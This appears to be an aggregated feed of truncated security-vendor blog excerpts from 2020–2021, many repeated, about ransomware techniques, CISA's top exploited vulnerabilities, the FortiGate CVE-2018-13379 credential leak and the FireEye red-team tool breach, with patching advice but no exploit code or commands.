This was not unexpected—depreciation of this certificate had been planned for some time by Let’s Encrypt as they are in the process of moving to the Self Signed ISRC Root X1 Root CA. In preparation for this, Fortinet had pushed out the new Root CA certificate ISRG Root X1 to FortiGate devices. Any Let’s Encrypt certificates issued since May 2021 using t
Trendmicro
Examining the Cring Ransomware Techniques
blogs_trendmicro·2021-09-24·CVSS 9.8
[CRITICAL] Examining the Cring Ransomware Techniques
## Examining the Cring Ransomware Techniques
In this entry, we look at the techniques typically employed by the Cring ransomware, as well as the most affected regions and industries.
By: Warren Sto.Tomas 2021/09/24 Read time: ( words)
Save to Folio
The Cring ransomware made headlines as the threat was used in an attack that exploited a bug in the 11-year-old version of the Adobe ColdFusion 9 software.
This has been the first recorded incident involving Cring operators’ use of the said vulnerability. Past Cring attacks either abused unsecure remote desktop protocol (RDP) or virtual private network (VPN) vulnerabilities to gain initial access.
Ransom.Win32.CRING.C is our detection name for the executable, while Ransom.MSIL.CRYNG.A is the detection name that is used to detect C#-based s
Trendmicro
Examining the Cring Ransomware Techniques
blogs_trendmicro·2021-09-24·CVSS 9.8
[CRITICAL] Examining the Cring Ransomware Techniques
## Examining the Cring Ransomware Techniques
In this entry, we look at the techniques typically employed by the Cring ransomware, as well as the most affected regions and industries.
By: Warren Sto.Tomas Sep 24, 2021 Read time: ( words)
Save to Folio
The Cring ransomware made headlines as the threat was used in an attack that exploited a bug in the 11-year-old version of the Adobe ColdFusion 9 software.
This has been the first recorded incident involving Cring operators’ use of the said vulnerability. Past Cring attacks either abused unsecure remote desktop protocol (RDP) or virtual private network (VPN) vulnerabilities to gain initial access.
Ransom.Win32.CRING.C is our detection name for the executable, while Ransom.MSIL.CRYNG.A is the detection name that is used to detect C#-based
Trendmicro
Examining the Cring Ransomware Techniques
blogs_trendmicro·2021-09-24·CVSS 9.8
[CRITICAL] Examining the Cring Ransomware Techniques
# Examining the Cring Ransomware Techniques
In this entry, we look at the techniques typically employed by the Cring ransomware, as well as the most affected regions and industries.
By: Warren Sto.Tomas
2021/09/24
Read time: ( words)
Save to Folio
The Cring ransomware made headlines as the threat was used in an attack that exploited a bug in the 11-year-old version of the Adobe ColdFusion 9 software.
This has been the first recorded incident involving Cring operators’ use of the said vulnerability. Past Cring attacks either abused unsecure remote desktop protocol (RDP) or virtual private network (VPN) vulnerabilities to gain initial access.
Ransom.Win32.CRING.C is our detection name for the executable, while Ransom.MSIL.CRYNG.A is the detection name that is used to detect C#-based s
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Exploits & Vulnerabilities
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay Sep 21, 2021 Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, unp
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Exploits & Vulnerabilities
# CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay
2021/09/21
Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, unpat
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Exploits y vulnerabilidades
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay Sep 21, 2021 Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, un
Huntress
The Top Four CVEs Attackers Exploit | Huntress
blogs_huntress·2021-09-21·CVSS 9.8
[CRITICAL] The Top Four CVEs Attackers Exploit | Huntress
While the move to remote work last year gave many of us comforts such as working in our pajamas and being 10 steps away from the fridge, it’s been a bit of a nightmare for those who work in cybersecurity.
The Institute for Security and Technology reports that in 2020, the victims of ransomware attacks paid $350M in ransom —a more than 300% increase over the previous year. By this year’s end, it’s predicted that cybercrime will cost the world $6 trillion . While cybercrime is a lucrative gig for hackers, it's expensive for the rest of us—and unfortunately, it's only getting worse with remote work.
In many ways, remote work has removed many of the security measures that organizations typically put in place to keep their data and networks secure. For example, corporate networks usually only
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Exploits & Vulnerabilities
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay 2021/09/21 Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, unpat
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Sfruttamento vulnerabilità
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay Sep 21, 2021 Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young, unp
Trendmicro
CISA Reports Top Vulnerabilities From Remote Work
blogs_trendmicro·2021-09-21·CVSS 9.1
[CRITICAL] CISA Reports Top Vulnerabilities From Remote Work
Ausnutzung von Schwachstellen
## CISA Reports Top Vulnerabilities From Remote Work
Trend Micro’s Next-Generation IPS protects organizations from threats as attackers now target remote work-related vulnerabilities.
By: Jon Clay Sep 21, 2021 Read time: ( words)
Save to Folio
As COVID-19 moves people to the cloud, cyber actors now aim at shooting the sky.
On July 28, 2021, the US Cybersecurity and Infrastructure Security Agency (CISA) released a report detailing the top exploited vulnerabilities in 2020 and 2021. The report shows that the attackers’ favorite new targets are vulnerabilities published after 2019 and relevant to remote work, VPN (Virtual Private Network), and cloud-based technologies.
As remote work became widespread, cyber actors have been taking advantage of the young,
Checkpoint
13th September – Threat Intelligence Report
blogs_checkpoint·2021-09-13·CVSS 9.8
CVE-2018-13379 [CRITICAL] 13th September – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 13th September – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th September, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Mēris, a new distributed denial-of-service (DDos) botnet has broken a record with a 21.8 million requests-per-second attack on Russian internet company Yandex; 250,000 devices are assumed to be compromised.
MyRepublic, a Singaporean communications services company, has disclosed a data breach exposing government ID c
Fortinet
Malicious Actor Discloses FortiGate SSL-VPN Credentials
blogs_fortinet·2021-09-08·CVSS 9.1
CVE-2018-13379 [CRITICAL] Malicious Actor Discloses FortiGate SSL-VPN Credentials
PSIRT BLOGS
Malicious Actor Discloses FortiGate SSL-VPN Credentials
By Carl Windsor | September 08, 2021
Fortinet has become aware that a malicious actor has recently disclosed SSL-VPN access information to 87,000 FortiGate SSL-VPN devices. These credentials were obtained from systems that remained unpatched against FG-IR-18-384 / CVE-2018-13379 at the time of the actor's scan. While they may have since been patched, if the passwords were not reset, they remain vulnerable.
This incident is related to an old vulnerability resolved in May 2019. At that time, Fortinet issued a PSIRT advisory and communicated directly with customers. And because customer security is our top priority, Fortinet subsequently issued multiple corporate blog posts detailing this issue, strongly encouraging custom
Tenable
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
blogs_tenable·2021-08-25
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
PSIRT and Responsible Disclosure
blogs_fortinet·2021-08-19
PSIRT and Responsible Disclosure
PSIRT BLOGS
PSIRT and Responsible Disclosure
By Carl Windsor | August 19, 2021
The Fortinet Product Security Incident Response Team (PSIRT) helps to coordinate security for over 40 products - hardware, software, virtual machine and cloud, and for more firewalls shipped per quarter than all four of our nearest competitors. We work hard daily to improve our processes, train employees, directly improve product security, and work closely with third-party threat researchers as well as ensure a timely response for all reported issues.
With regards to the FortiWeb vulnerability identified by Rapid7, Fortinet has published an Out of Cycle Advisory, FG-IR-21-116, to advise of the resolution and provide a workaround.
Workaround: Disable access to the management interface from untrusted networks,
Tenable
How Risk-based Vulnerability Management Can Help Address the Most Commonly Exploited Vulnerabilities Today
blogs_tenable·2021-07-30
How Risk-based Vulnerability Management Can Help Address the Most Commonly Exploited Vulnerabilities Today
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
blogs_qualys·2021-07-29·CVSS 10.0
[CRITICAL] CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
#### Table of Contents
- Top Routinely Exploited Vulnerabilities
- Detect CISAs Top Routinely Exploited Vulnerabilities using Qualys VMDR
- Recommendations
- Remediation and Mitigation
- Get Started Now
On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a cybersecurity advisory detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.
The advisory states, “If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the large
Qualys
CISA Alert: Top Routinely Exploited Vulnerabilities
blogs_qualys·2021-07-29·CVSS 9.1
[CRITICAL] CISA Alert: Top Routinely Exploited Vulnerabilities
## Table of Contents
Top Routinely Exploited Vulnerabilities
Detect CISAs Top Routinely Exploited Vulnerabilities using Qualys VMDR
Recommendations
Remediation and Mitigation
Get Started Now
On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a cybersecurity advisory detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.
The advisory states, “If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest numbe
Fortinet
Fortinet Provides Immediate Patch Update and Mitigations for Critical FortiManager and FortiAnalyzer Vulnerability - CVE-2021-32589
blogs_fortinet·2021-07-20·CVSS 8.1
CVE-2021-32589 [HIGH] Fortinet Provides Immediate Patch Update and Mitigations for Critical FortiManager and FortiAnalyzer Vulnerability - CVE-2021-32589
PSIRT BLOGS
Fortinet Provides Immediate Patch Update and Mitigations for Critical FortiManager and FortiAnalyzer Vulnerability - CVE-2021-32589
By Carl Windsor | July 20, 2021
On July 19, Fortinet published a security advisory documenting and sharing patches and workarounds for a Use-After-Free (UAF) vulnerability (CWE-416) in FortiManager, and in some edge cases, FortiAnalyzer. If not updated using the patch and mitigations provided by Fortinet, this vulnerability may allow a remote, non-authenticated attacker to execute unauthorized code as root via sending a specifically crafted request to the targeted device.
We urgently reiterate our strong recommendation for any customers who have not yet updated their devices that they take immediate action to mitigate this risk. This includes up
Talos
Threat Source newsletter (June 17, 2021)
blogs_talos·2021-06-17
Threat Source newsletter (June 17, 2021)
Good afternoon, Talos readers.
Although the Colonial Pipeline attack is largely behind us now, its potential repercussions are not. This was just the latest in a string of attacks against American critical infrastructure over the past few years, and we don't expect them to slow down any time soon.
Talos researchers have outlined a series of steps critical infrastructure organizations can take to secure their networks, and what the government needs to do to protect physical property and prevent potential life-threatening attacks. If you are experiencing an emergency or in need of an incident response retainer, Cisco Talos Incident Responseis available for proactive and emergency response.
## Cybersecurity week in review
- NATO's Secretary General suggested that any cyber attacks on memb
Talos
Threat Source newsletter (June 17, 2021)
blogs_talos·2021-06-17
Threat Source newsletter (June 17, 2021)
## Threat Source newsletter (June 17, 2021)
Good afternoon, Talos readers.
Although the Colonial Pipeline attack is largely behind us now, its potential repercussions are not. This was just the latest in a string of attacks against American critical infrastructure over the past few years, and we don't expect them to slow down any time soon.
Talos researchers have outlined a series of steps critical infrastructure organizations can take to secure their networks , and what the government needs to do to protect physical property and prevent potential life-threatening attacks. If you are experiencing an emergency or in need of an incident response retainer, Cisco Talos Incident Response is available for proactive and emergency response.
## Cybersecurity week in review
NATO's Secretary Gen
Fortinet
Prioritizing Patching is Essential for Network Integrity
blogs_fortinet·2021-06-01·CVSS 9.1
[CRITICAL] Prioritizing Patching is Essential for Network Integrity
PSIRT BLOGS
Prioritizing Patching is Essential for Network Integrity
By Carl Windsor | June 01, 2021
Regarding the FBI - CISA/NCSC alerts of FortiGate SSL-VPN vulnerabilities being exploited in the wild
A recent FBI advisory outlined that foreign hackers had gained access to a local US municipal government network after exploiting vulnerabilities in an unpatched Fortinet networking appliance.
This advisory, however, was not the result of cybercriminals targeting a newly identified security issue. The sad fact is, fixes for these vulnerabilities had been shared with affected customers over two years ago. This and similar incidents highlight that the failure to patch vulnerable systems still represents one of the most critical security gaps in many organizations and is responsible for th
Checkpoint
19th April – Threat Intelligence Report
blogs_checkpoint·2021-04-19·CVSS 9.8
CVE-2018-13379 [CRITICAL] 19th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 19th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 19th April, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
The U.S National Security Agency (NSA), the Cybersecurity and infrastructure security agency (CISA), and the Federal Bureau of Investigation (FBI) have published a joint advisory warning that a Russia-linked APT group, APT25, is exploiting five vulnerabilities in an ongoing attack against U.S targets.
Check Point IPS provide
Talos
Threat Advisory: NSA SVR Advisory Coverage
blogs_talos·2021-04-15·CVSS 9.1
[CRITICAL] Threat Advisory: NSA SVR Advisory Coverage
## Threat Advisory: NSA SVR Advisory Coverage
The U.S. National Security Agency released an advisory outlining several vulnerabilities that the Russian Foreign Intelligence Services (SVR) is exploiting in the wild. The U.S. formally attributed the recent SolarWinds supply chain attack to the SVR group in this advisory and detailed more of the group's tactics, techniques and procedures.
The exploits included a series of five CVEs that affect VPN solutions, collaboration suite software and virtualization technologies. All five of the CVEs have been patched — Cisco Talos encourages everyone with the affected software update immediately. Some of these vulnerabilities also have working metasploit modules and are currently being widely exploited. Please note that some of these vulnerabilities
Talos
Threat Advisory: NSA SVR Advisory Coverage
blogs_talos·2021-04-15·CVSS 9.1
[CRITICAL] Threat Advisory: NSA SVR Advisory Coverage
The U.S. National Security Agency released an advisory outlining several vulnerabilities that the Russian Foreign Intelligence Services (SVR) is exploiting in the wild. The U.S. formally attributed the recent SolarWinds supply chain attack to the SVR group in this advisory and detailed more of the group's tactics, techniques and procedures.
The exploits included a series of five CVEs that affect VPN solutions, collaboration suite software and virtualization technologies. All five of the CVEs have been patched — Cisco Talos encourages everyone with the affected software update immediately. Some of these vulnerabilities also have working metasploit modules and are currently being widely exploited. Please note that some of these vulnerabilities exploit applications leveraging SSL. This means
Tenable
CVE-2018-13379, CVE-2019-5591, CVE-2020-12812: Fortinet Vulnerabilities Targeted by APT Actors
blogs_tenable·2021-04-08·CVSS 9.1
[CRITICAL] CVE-2018-13379, CVE-2019-5591, CVE-2020-12812: Fortinet Vulnerabilities Targeted by APT Actors
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
5th April – Threat Intelligence Report
blogs_checkpoint·2021-04-05
CVE-2021-21975 5th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 5th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 5th April, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Personal information of some 553 million Facebook users from 100 countries has been stolen and published online for free in a hacking forum. The records include full name, Facebook ID, phone number, email, location, bio and more.
Iranian APT group Charming Kitten, linked to the government, has launched a new phishing campaign
Fortinet
Patch and Vulnerability Management | Fortinet
blogs_fortinet·2021-04-03·CVSS 6.5
[MEDIUM] Patch and Vulnerability Management | Fortinet
PSIRT BLOGS
Patch and Vulnerability Management
By Carl Windsor | April 03, 2021
In May 2019, Fortinet issued a PSIRT advisory regarding an SSL vulnerability that had been identified by a third party research team and which we resolved. As part of this process, we issued a Customer Support Bulletin (CSB-200716-1) to highlight the need for customers to upgrade their affected systems. We also published a blog about this for our customers in August 2019 when this vulnerability was made public post-resolution at Black Hat in August 2019. Over a year later , the UK NCSC shared that these same vulnerabilities were still being targeted in the wild, and we published another blog in July 2020 and then another in November 2020 with the goal of continuing to educate and communicate with our customer
Tenable
Healthcare Security: Ransomware Plays a Prominent Role in COVID-19 Era Breaches
blogs_tenable·2021-03-10
Healthcare Security: Ransomware Plays a Prominent Role in COVID-19 Era Breaches
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Examining a Sodinokibi Attack
blogs_trendmicro·2021-01-26·CVSS 9.1
[CRITICAL] Examining a Sodinokibi Attack
# Examining A Sodinokibi Attack
Sodinokibi was behind several notable attacks last year. In this entry, we describe its attack process using some of the examples we encountered.
By: Trend Micro Research
2021/01/26
Read time: ( words)
Save to Folio
Sodinokibi was first detected in April 2019 and linked to the retired GandCrab. From that point on, Sodinokibi launched several high-profile attacks that continued throughout 2020, thus making a name for itself as one of the ransomware families that should be watched out for. Here we describe Sodinokibi’s typical attack process.
Technical analysis
The threat actors behind Sodinokibi typically hire a variety of affiliates for their initial access. Their attacks often begin with familiar techniques like malspam emails with spear-phishing lin
Tenable
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
blogs_tenable·2021-01-21
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Unit42
Threat Brief: FireEye Red Team Tool Breach
blogs_unit42·2020-12-11
Threat Brief: FireEye Red Team Tool Breach
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: FireEye Red Team Tool Breach
Unit 42
Published: December 10, 2020
High Profile Threats
Malware
Vulnerabilities
FireEye breach
## Executive Summary
On Dec. 8, 2020, one of the leading cybersecurity companies in the industry, FireEye, reported a breach and data exfiltration unlike any that we have seen previously. What makes this attack unique is not only the target, FireEye being a well-known cybersecurity company, but that the stolen data contains the internal, custom-crafted red-team and penetration testing tools used by the company to imitate different threat actors during customer security consultations. FireEye’s blog provided a wealth of information for defenders to implement security controls
Unit42
Threat Brief: FireEye Red Team Tool Breach
blogs_unit42·2020-12-11
Threat Brief: FireEye Red Team Tool Breach
## Executive Summary
On Dec. 8, 2020, one of the leading cybersecurity companies in the industry, FireEye, reported a breach and data exfiltration unlike any that we have seen previously. What makes this attack unique is not only the target, FireEye being a well-known cybersecurity company, but that the stolen data contains the internal, custom-crafted red-team and penetration testing tools used by the company to imitate different threat actors during customer security consultations. FireEye’s blog provided a wealth of information for defenders to implement security controls and mitigations for defense against the stolen tools. This data is being used by Palo Alto Networks to help ensure our customers are protected if the attackers choose to utilize the tools for malicious purposes.
It i
Fortinet
FireEye Red Team Tool Breach | Fortinet
blogs_fortinet·2020-12-11·CVSS 8.8
[HIGH] FireEye Red Team Tool Breach | Fortinet
PSIRT BLOGS
FireEye Red Team Tool Breach
By Carl Windsor | December 11, 2020
Executive Summary
On December 8th cyber security vendor FireEye reported a breach of their network and data exfiltration which included their internally developed Red Team tools. FireEye took the step of publishing details of these tools in a GitHub repository to allow other vendors to protect against their use by potential adversaries.
This breach has been attributed to a nation state threat actor so we do not expect to see these tools be widely abused in the wild, however with the additional information provided by FireEye, Fortinet have been able to ensure that these tools cannot be abused.
Threat Mitigation
None of the vulnerabilities disclosed as targeted in the tools were zero days, therefore FortiGuard
Qualys
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach
blogs_qualys·2020-12-10
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach
Update Jan 5, 2021 : New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.
Update Dec 23, 2020 : Added a new section on compensating controls.
Update Dec 22, 2020: FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.
Using Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):
Active Attacks
Solorigate Sunburst ( New RTI )
Original post : On December 8, 2020, FireEye disclosed theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the securit
Qualys
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach | Qualys
blogs_qualys·2020-12-10
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach | Qualys
Update Jan 5, 2021: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.
Update Dec 23, 2020: Added a new section on compensating controls.
Update Dec 22, 2020: FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.
Using Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):
- Active Attacks
- Solorigate Sunburst (New RTI)
Original post: On December 8, 2020, FireEye disclosed theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security
Zscaler
SolarWinds CyberAttack and FireEye Red Team Tools Coverage
blogs_zscaler·2020-12-09
SolarWinds CyberAttack and FireEye Red Team Tools Coverage
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Fortinet
Update Regarding CVE-2018-13379 | Fortinet
blogs_fortinet·2020-11-30·CVSS 9.1
CVE-2018-13379 [CRITICAL] Update Regarding CVE-2018-13379 | Fortinet
PSIRT BLOGS
Update Regarding CVE-2018-13379
By Carl Windsor | November 30, 2020
The security of our customers is our first priority. As part of our standard PSIRT process, upon an indication of an alleged vulnerability shared through responsible disclosure, Fortinet works hard to remediate those potential vulnerabilities and then communicates mitigation guidance. And, as a PSIRT team and forward-looking security vendor, we are constantly seeking ways to engage, educate, and encourage our customers to institute mitigation best practices and to patch their systems.
For example, in May 2019 Fortinet issued a PSIRT advisory regarding an SSL vulnerability that was resolved, and have also communicated directly with customers and again via corporate blog posts in August 2019 and July 2020 stro
Tenable
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
blogs_tenable·2020-10-23
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2020-5135: Critical SonicWall VPN Portal Stack-based Buffer Overflow Vulnerability
blogs_tenable·2020-10-15·CVSS 9.8
[CRITICAL] CVE-2020-5135: Critical SonicWall VPN Portal Stack-based Buffer Overflow Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2020-1472: Advanced Persistent Threat Actors Use Zerologon Vulnerability In Exploit Chain with Unpatched Vulnerabilities
blogs_tenable·2020-10-12·CVSS 5.5
